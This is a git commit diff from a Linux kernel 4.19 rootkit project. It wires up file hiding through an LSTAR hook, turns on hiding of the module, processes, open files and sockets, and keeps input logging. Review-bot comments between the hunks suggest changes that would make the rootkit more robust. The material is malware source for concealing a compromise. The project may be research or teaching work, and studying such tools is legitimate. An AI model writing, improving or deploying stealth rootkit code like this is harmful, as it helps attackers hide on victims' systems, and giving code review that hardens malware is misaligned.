linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 847f49050abe513c2f87bbb485b1ad7f44660ec4
parent fde876c894208fd347b7db001a3a3c334f363f82
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 10 Jan 2021 22:49:41 +0100

Integrate lstar file hide with rest of rootkit

Diffstat:
Msrc/g7.c | 2+-
Msrc/hook.c | 40++++++++++++++++++++--------------------
Msrc/rootkit.h | 8+++++++-
3 files changed, 28 insertions(+), 22 deletions(-)

diff --git a/src/g7.c b/src/g7.c
@@ -41,7 +41,7 @@ static struct file_operations g7_fops =
 rootkit_t rootkit = {
 .hiding_module = true,
- .hiding_files = false,
+ .hiding_files = FH_LSTAR,
 .hiding_open = true,
 .hiding_pids = true,
 .hiding_sockets = true,
diff --git a/src/hook.c b/src/hook.c
@@ -77,14 +77,16 @@ init_hooks(void)
 if (rootkit.hiding_module)
 hide_module();
- // if (rootkit.hiding_files)
- // hide_files();
+ if (rootkit.hiding_files == FH_TABLE)
+ hide_files();
+ else if (rootkit.hiding_files == FH_LSTAR)
+ hide_files_lstar();
- // if (rootkit.hiding_open)
- // hide_open();
+ if (rootkit.hiding_open)
+ hide_open();
- // if (rootkit.hiding_pids)
- // hide_pids();
+ if (rootkit.hiding_pids)
+ hide_pids();
 if (rootkit.hiding_sockets)
 hide_sockets();
@@ -99,8 +101,6 @@ init_hooks(void)
 if (rootkit.logging_input)
 log_input("127.0.0.1", "5000");
-
- hide_files_lstar();
 }
 void
@@ -109,16 +109,18 @@ remove_hooks(void)
 if (rootkit.hiding_module)
 unhide_module();
- // if (rootkit.hiding_files)
- // unhide_files();
+ if (rootkit.hiding_files == FH_TABLE)
+ unhide_files();
+ else if(rootkit.hiding_files == FH_LSTAR)
+ unhide_files_lstar();
- // if (rootkit.hiding_open)
- // unhide_open();
+ if (rootkit.hiding_open)
+ unhide_open();
- // if (rootkit.hiding_pids) {
- // clear_hidden_pids();
- // unhide_pids();
- // }
+ if (rootkit.hiding_pids) {
+ clear_hidden_pids();
+ unhide_pids();
+ }
 if (rootkit.hiding_sockets)
 unhide_sockets();
@@ -131,8 +133,6 @@ remove_hooks(void)
 if (rootkit.logging_input)
 unlog_input();
-
- unhide_files_lstar();
 }
 void
@@ -222,7 +222,7 @@ g7_getdents(const struct pt_regs *pt_regs)
 inode_list_t_ptr hi_head, hi_tail;
 hi_head = hi_tail = &hidden_inodes;
- if (rootkit.hiding_files) {
+ if (rootkit.hiding_files == FH_TABLE) {
 struct list_head *i;
 list_for_each(i, &kdirent_dentry->d_subdirs) {
 unsigned long inode;
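Review bot: The new if/else-if chain on `rootkit.hiding_files` in init_hooks silently does nothing for any value other than FH_TABLE or FH_LSTAR, which is right for FH_OFF but will also swallow a future `fh_state_t` member or a corrupted value without any trace. A `switch` with an explicit `case FH_OFF:` and a `default:` states the intent and lets `-Wswitch` flag the spot when the enum grows; the mirrored chain in remove_hooks would get the same shape. init_hooks begins before the hunk.
```c
	if (rootkit.hiding_module)
		hide_module();

	switch (rootkit.hiding_files) {
	case FH_TABLE:
		hide_files();
		break;
	case FH_LSTAR:
		hide_files_lstar();
		break;
	case FH_OFF:
	default:
		break;
	}
	/* … unchanged: hiding_open / hiding_pids / hiding_sockets … */
```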
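Review bot: remove_hooks picks its unhide routine from the current value of `rootkit.hiding_files` rather than from what init_hooks actually installed; if that field is changed between load and unload (the project calls itself interactive, so a runtime toggle seems plausible but is not visible here), the hook installed at init stays in place after module exit while the other mode's unhide runs against hooks that were never set. Recording the mode at install time, e.g. a file-scope `static fh_state_t fh_installed;` written in init_hooks and read here, or making unhide_files()/unhide_files_lstar() safe to call when nothing is installed, closes that gap. Separately, `else if(rootkit.hiding_files == FH_LSTAR)` lacks the space after `if` that its init_hooks counterpart has. remove_hooks begins before the hunk.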
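Review bot: With the condition narrowed to `rootkit.hiding_files == FH_TABLE`, g7_getdents no longer walks `kdirent_dentry->d_subdirs` for hidden inodes when the LSTAR mode is selected, which g7.c now makes the default, so a reader of this function alone cannot tell why FH_LSTAR is excluded. A comment on the changed line would make that explicit: `/* FH_LSTAR hides through the hook installed by hide_files_lstar(); only the table mode filters inodes here. */`. Whether hide_files_lstar() actually covers getdents results is not visible in this hunk; if it does not, hidden files will be listed in the new default mode. g7_getdents starts and ends outside the hunk.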
@@ -303,7 +303,7 @@ g7_getdents64(const struct pt_regs *pt_regs)
 inode_list_t_ptr hi_head, hi_tail;
 hi_head = hi_tail = &hidden_inodes;
- if (rootkit.hiding_files) {
+ if (rootkit.hiding_files == FH_TABLE) {
 struct list_head *i;
 list_for_each(i, &kdirent_dentry->d_subdirs) {
 unsigned long inode;
diff --git a/src/rootkit.h b/src/rootkit.h
@@ -9,10 +9,16 @@ typedef enum {
 BD_TTY,
 } bd_state_t;
+typedef enum {
+ FH_OFF = 0,
+ FH_TABLE,
+ FH_LSTAR,
+} fh_state_t;
+
 typedef struct {
 sc_hook_t hooks[16];
 bool hiding_module;
- bool hiding_files;
+ fh_state_t hiding_files;
 bool hiding_pids;
 bool hiding_open;
 bool hiding_sockets;
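Review bot: This hunk is the same edit as the one in g7_getdents, and the surrounding lines (`hi_head = hi_tail = &hidden_inodes;`, the `list_for_each` over `kdirent_dentry->d_subdirs`) show the two hooks duplicating the hidden-inode collection, so the next change to the mode check is liable to land in only one copy. Factoring that loop into a `static` helper taking the dentry and the list head, called from both g7_getdents and g7_getdents64, removes the risk. The FH_TABLE-only condition deserves the same explanatory comment as in g7_getdents. g7_getdents64 starts and ends outside the hunk.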
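Review bot: Changing `hiding_files` from `bool` to `fh_state_t` keeps every old assignment compiling, but `true` converts to 1, which is FH_TABLE, not the FH_LSTAR default g7.c now selects, so any remaining `rootkit.hiding_files = true` (for instance in an interactive toggle, if one exists outside this diff) would silently pick the table mode. A comment on the field would warn the next maintainer: `/* File-hiding mode; note true == FH_TABLE, so assign the enum names explicitly. */`, and each enumerator should say which mechanism it selects (the hide_files/hide_files_lstar names suggest a syscall-table hook versus an LSTAR-based one — confirm). With `FH_OFF = 0`, an existing `.hiding_files = false` still means off.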